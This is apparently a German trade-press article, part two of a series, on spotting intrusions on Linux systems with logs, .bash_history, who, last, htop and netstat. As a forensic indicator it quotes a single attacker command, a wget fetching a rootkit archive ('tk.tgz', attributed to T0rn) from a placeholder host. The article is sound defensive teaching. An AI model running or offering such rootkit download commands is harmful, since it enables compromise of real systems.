Suchen

Einbruchserkennung mit Linux – Teil 2 Hacking mit Security-Tools wie Netstat, Snort und RKhunter aufspüren

| Autor / Redakteur: Marko Rogge / Stephan Augsten

Linux-Systeme werden im professionellen Umfeld immer beliebter und sind deshalb längst auch interessante Angriffsziele für Hacker. Dank Open Source können sich Admins aber bei Linux-basierten Systemen detaillierter mit dem System befassen und damit über mitgelieferte Bordmittel kompromittierte Systeme und gefährliche Aktionen erkennen. Security-Insider.de verrät, welche Fehler Angreifer machen und welche Tools hilfreich sein können, um Angriffe sicher zu erkennen und sich davor zu schützen.

Firma zum Thema

Linux-Systeme sind Angriffsziele für Hacker geworden, aber Admins können sich mit Tools wehren und Systemmanipulationen aufspüren.
Linux-Systeme sind Angriffsziele für Hacker geworden, aber Admins können sich mit Tools wehren und Systemmanipulationen aufspüren.
( Archiv: Vogel Business Media )

Versierte Angreifer würden in jedem Fall versuchen, die eigenen Spuren eines Angriffes zu verwischen und entsprechende Logfiles unbrauchbar zu machen. In diesem Fall wird es schwierig, Details einer Attacke gegen ein System in Erfahrung zu bringen.

Sofern in den Logfiles verräterische große Lücken in den Zeiten auftauchen, sollten Sie misstrauisch sein. Denn auch dann ist die Wahrscheinlichkeit sehr groß, dass ein Angreifer nur seine selbst generierten Einträge gelöscht hat.

Bildergalerie

Falls der Angreifer Daten und Dateien nachgeladen hat, um zum Beispiel ein Rootkit zu installieren, dürfte man diesen Vorgang in der .bash_history des root-Accounts sehen. Dort sollte der Befehl „wget“ mit der dazu gehörigen Datei auftauchen, die aus dem Internet nachgeladen wurde. Ein Beispiel könnte demnach wie folgt aussehen:

wget http://ultradomain.xxxx.co.uk/~/xxx/tk.tgz

Im vorgezeigten Beispiel würde die Datei „tk.tgz“ darauf deuten, dass es sehr wahrscheinlich ist, dass der Angreifer das Rootkit „T0rn“ nachgeladen und installiert hat. Hierbei ist größte Vorsicht geboten und das betroffene System sollte unbedingt auf Rootkit-Spuren untersucht werden. Im letzten Abschnitt gehen wir dann darauf ein, mit welchen Hilfsmitteln und Programmen Rootkits aufgespürt werden können.

Zunächst gehen wir weiter mit der Analyse voran und schauen, was genau auf einer Maschine läuft und welche User in einem System arbeiten. Die Befehle hierfür sollten hinlänglich bekannt sein und auch genutzt werden:

~$ who

In dieser who-Abfrage sollte sich auf der Konsole kein weiterer User befinden als der aktive Benutzer selbst. Befinden sich dort mehr angemeldete User, dann ist dies ein klares Anzeichen für einen erfolgreichen Angriff auf das betroffene System.

Weitere Details erhält man mit dem Konsolen-Befehl „last“, der Informationen zu aktuell angemeldeten Usern anzeigt und zusätzlich die Aktivitäten der vergangenen Tage aufzeigt. Die Kombination dieser beiden Konsolen-Befehle zeigt exakt auf, was derzeit aktuell in einem System arbeitet. Man erhält unter anderem auch Informationen zu abgesetzten Befehle in der Konsole, über die ein Angreifer grundlegend arbeitet.

Für eine Echtzeitüberwachung empfehlen wir den Befehl „top“. Um noch mehr Informationen herauszuholen und diese übersichtlicher dargestellt zu bekommen, sollte man sich „htop“ nachinstallieren. „htop“ zeigt farblich getrennt alle Details in Echtzeit auf einem System. Da eine solche Analyse sehr zeitintensiv ist, muss man unbedingt prüfen, welche Software über die Netzwerkschnittstellen kommuniziert:

~$ netstat –tanp

Seite 2: Mehr Sicherheit vor Angreifern: rkhunter findet Rootkits

Artikelfiles und Artikellinks

(ID:2012507)